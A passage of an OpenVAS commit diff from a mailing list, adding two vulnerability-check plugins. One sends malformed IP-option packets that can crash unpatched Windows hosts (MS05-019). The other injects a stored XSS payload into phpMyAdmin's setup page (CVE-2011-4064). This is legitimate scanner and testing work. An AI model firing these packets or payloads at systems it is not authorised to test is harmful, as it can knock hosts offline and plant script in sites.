+  Microsoft Windows 2000 Server SP4 and prior.
+
+  Run Windows Update and update the listed hotfixes or download and
+  update mentioned hotfixes in the advisory from the below link,
+  http://technet.microsoft.com/en-us/security/bulletin/ms05-019
+
+  References:
+  http://secunia.com/advisories/14512
+  http://securitytracker.com/id/1013686
+  http://technet.microsoft.com/en-us/security/bulletin/ms05-019 ";
+
+  script_description(desc);
+  script_summary("Determine Internet Protocol Validation Remote Code Execution Vulnerability");
+  script_category(ACT_KILL_HOST);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Windows : Microsoft Bulletins");
+  script_require_ports(139, 445);
+  exit(0);
+}
+
+
+include("smb_nt.inc");
+
+if(TARGET_IS_IPV6()){
+  exit(0);
+}
+
+## Get SMB Port
+port = kb_smb_transport();
+if(!port) {
+  port = 445;
+}
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Building Exploit
+dstaddr = get_host_ip();
+srcaddr = this_host();
+sport = rand() % (65536 - 1024) + 1024;
+
+## IP packet with an option size 39
+options = raw_string(0x03, 0x27, crap(data:"G", length:38));
+
+ip = forge_ip_packet( ip_v   : 4,
+                      ip_hl  : 15,
+                      ip_tos : 0,
+                      ip_len : 20,
+                      ip_id  : rand(),
+                      ip_p   : IPPROTO_TCP,
+                      ip_ttl : 64,
+                      ip_off : 0,
+                      ip_src : srcaddr,
+                      data   : options );
+
+
+tcp = forge_tcp_packet( ip       : ip,
+                        th_sport : sport,
+                        th_dport : port,
+                        th_flags : TH_SYN,
+                        th_seq   : rand(),
+                        th_ack   : 0,
+                        th_x2    : 0,
+                        th_off   : 5,
+                        th_win   : 512,
+                        th_urp   : 0 );
+
+## Sending Exploit
+start_denial();
+for( i = 0; i < 5 ; i ++ ) {
+  result = send_packet(tcp,pcap_active:FALSE);
+}
+alive = end_denial();
+
+## Confirm Host is Still Alive and Responding
+if(! alive) {
+  security_hole(port);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,172 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_phpmyadmin_setup_interface_xss_vuln.nasl 18295 2011-11-22 17:17:17Z nov $
+#
+# phpMyAdmin Setup Interface Cross Site Scripting Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902585);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-4064");
+  script_bugtraq_id(50175);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-22 17:17:17 +0530 (Tue, 22 Nov 2011)");
+  script_name("phpMyAdmin Setup Interface Cross Site Scripting Vulnerability");
+  desc = "
+  Overview: The host is running phpMyAdmin and is prone to cross-site scripting
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to improper validation of user-supplied input
+  via the 'Servers-0-verbose' parameter to setup/index.php, which allows
+  attackers to execute arbitrary HTML and script code in a user's browser
+  session in the context of an affected site.
+
+  Impact:
+  Successful exploitation will allow remote attackers to insert arbitrary HTML
+  and script code, which will be executed in a user's browser session in the
+  context of an affected site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  phpMyAdmin versions 3.4.x before 3.4.6
+
+  Fix: Upgrade to phpMyAdmin version 3.4.6 or later,
+  For updates refer, http://www.phpmyadmin.net/home_page/downloads.php
+
+  References:
+  http://osvdb.org/show/osvdb/76711
+  http://secunia.com/advisories/46431
+  http://securitytracker.com/id/1026199
+  http://xforce.iss.net/xforce/xfdb/70681
+  http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php
+  http://hauntit.blogspot.com/2011/09/stored-xss-in-phpmyadmin-345-all.html ";
+
+  script_description(desc);
+  script_summary("Check if phpMyAdmin is vulnerable to Cross-Site Scripting");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("secpod_phpmyadmin_detect_900129.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+## Get phpMyAdmin Location
+if(!dir = get_dir_from_kb(port:port, app:"phpMyAdmin")){
+  exit(0);
+}
+
+## Send and Receive the response
+url = "/setup/index.php?tab_hash=&check_page_refresh=1&page=servers&mode=" +
+      "add&submit=New+server";
+req = http_get(item:dir+url,  port:port);
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Get Session ID
+cookie = eregmatch(pattern:"Set-Cookie: ([^;]*);", string:res);
+if(isnull(cookie[1])) {
+  exit(0);
+}
+cookie = cookie[1];
+
+## Get Token
+token = eregmatch(pattern:'name="token" value="([a-zA-Z0-9]+)"', string:res);
+if(isnull(token[1])) {
+  exit(0);
+}
+token = token[1];
+
+## Construct attack request
+data = string("tab_hash=&check_page_refresh=1&token=", token, "&Servers-0-",
+              "verbose=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E",
+              "&Servers-0-host=localhost&Servers-0-port=&Servers-0-socket=&S",
+              "ervers-0-connect_type=tcp&Servers-0-extension=mysqli&submit_s",
+              "ave=Save&Servers-0-auth_type=cookie&Servers-0-user=root&Serve",
+              "rs-0-password=&Servers-0-auth_swekey_config=&Servers-0-auth_h",
+              "ttp_realm=&Servers-0-SignonSession=&Servers-0-SignonURL=&Serv",
+              "ers-0-LogoutURL=&Servers-0-only_db=&Servers-0-only_db-userpre",
+              "fs-allow=on&Servers-0-hide_db=&Servers-0-hide_db-userprefs-al",
+              "low=on&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-",
+              "0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowD",
+              "atabasesCommand=SHOW+DATABASES&Servers-0-pmadb=&Servers-0-con",
+              "troluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&S",
+              "ervers-0-bookmarktable=&Servers-0-relation=&Servers-0-usercon",
+              "fig=&Servers-0-table_info=&Servers-0-column_info=&Servers-0-h",
+              "istory=&Servers-0-tracking=&Servers-0-table_coords=&Servers-0",
+              "-pdf_pages=&Servers-0-designer_coords=&Servers-0-tracking_def",
+              "ault_statements=CREATE+TABLE%2CALTER+TABLE%2CDROP+TABLE%2CREN",
+              "AME+TABLE%2CCREATE+INDEX%2CDROP+INDEX%2CINSERT%2CUPDATE%2CDEL",
+              "ETE%2CTRUNCATE%2CREPLACE%2CCREATE+VIEW%2CALTER+VIEW%2CDROP+VI",
+              "EW%2CCREATE+DATABASE%2CALTER+DATABASE%2CDROP+DATABASE&Servers",
+              "-0-tracking_add_drop_view=on&Servers-0-tracking_add_drop_tabl",
+              "e=on&Servers-0-tracking_add_drop_database=on");
+
+url = string(dir, '/setup/index.php?tab_hash=&check_page_refresh=1',
+             '&token=', token, '&page=servers&mode=add&submit=New+server');
+
+req = string("POST ", url, " HTTP/1.1\r\n",
+             "Host: ", get_host_name(), "\r\n",
+             "User-Agent: OpenVAS\r\n",
+             "Cookie: ", cookie, "\r\n",
+             "Content-Type: application/x-www-form-urlencoded\r\n",
+             "Content-Length: ", strlen(data), "\r\n\r\n", data);
+
+## Send crafted POST request and receive the response
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Confirm exploit
+if(res =~ "HTTP/1.. 30")
+{
+  ## Send request and receive the response
+  req = http_get(item:string(dir,"/setup/index.php"), port:port);
+  req = string(chomp(req), '\r\nCookie: ', cookie, '\r\n\r\n');
+  res = http_keepalive_send_recv(port:port, data:req);
+
+  ## Confirm exploit worked by checking the response
+  if("Use SSL (<script>alert(document.cookie)</script>)" >< res){
+    security_warning(port);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date



More information about the Openvas-commits mailing list